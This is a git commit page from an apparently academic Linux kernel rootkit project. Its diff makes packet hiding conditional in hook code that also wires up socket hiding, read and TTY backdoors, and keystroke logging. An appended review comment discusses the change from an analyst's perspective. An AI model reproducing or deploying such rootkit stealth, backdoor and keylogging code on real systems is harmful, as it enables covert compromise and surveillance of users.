linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 19f24a7529b76bc8361e5271c5b7f1e8544e6cb9
parent 10b6003da5e1cd098ed4ffb88816cb756ba8f02f
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 19 Dec 2020 23:50:12 +0100

adds packet hiding to hook_init

Diffstat:
Msrc/hook.c | 10++++++----
1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -88,6 +88,9 @@ init_hooks(void)
 if (rootkit.hiding_sockets)
 hide_sockets();

+ if (rootkit.hiding_packets)
+ hide_packets();
+
 if (rootkit.backdoor == BD_READ)
 backdoor_read();
 else if (rootkit.backdoor == BD_TTY)
@@ -95,8 +98,6 @@ init_hooks(void)

 if (rootkit.logging_input)
 log_input("127.0.0.1", "5000");
-
- hide_packets();
 }

 void
@@ -119,13 +120,14 @@ remove_hooks(void)
 if (rootkit.hiding_sockets)
 unhide_sockets();

+ if (rootkit.hiding_packets)
+ unhide_packets();
+
 if (rootkit.backdoor != BD_OFF)
 unbackdoor();

 if (rootkit.logging_input)
 unlog_input();
-
- unhide_packets();
 }

 void
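Review bot: The new `if (rootkit.hiding_packets)` guard in init_hooks (first hunk) and its twin in remove_hooks (third hunk) carry no comment, and the commit subject misdescribes them: it names `hook_init` and says packet hiding is added, while the removed lines show `hide_packets()` was already called unconditionally and is only being made conditional. A comment at the guard such as `/* packet hiding is opt-in: installed only when rootkit.hiding_packets is set */` would record that. remove_hooks reads the flag again at teardown, so whether `unhide_packets()` runs appears to depend on the flag's value at that moment rather than on what init_hooks installed; this is inferred from the visible lines only, since both function bodies start outside the hunks. For an analyst working from this tree, the consequence is that a loaded build may carry no packet-filtering hook at all, so the absence of that artifact does not rule the module out.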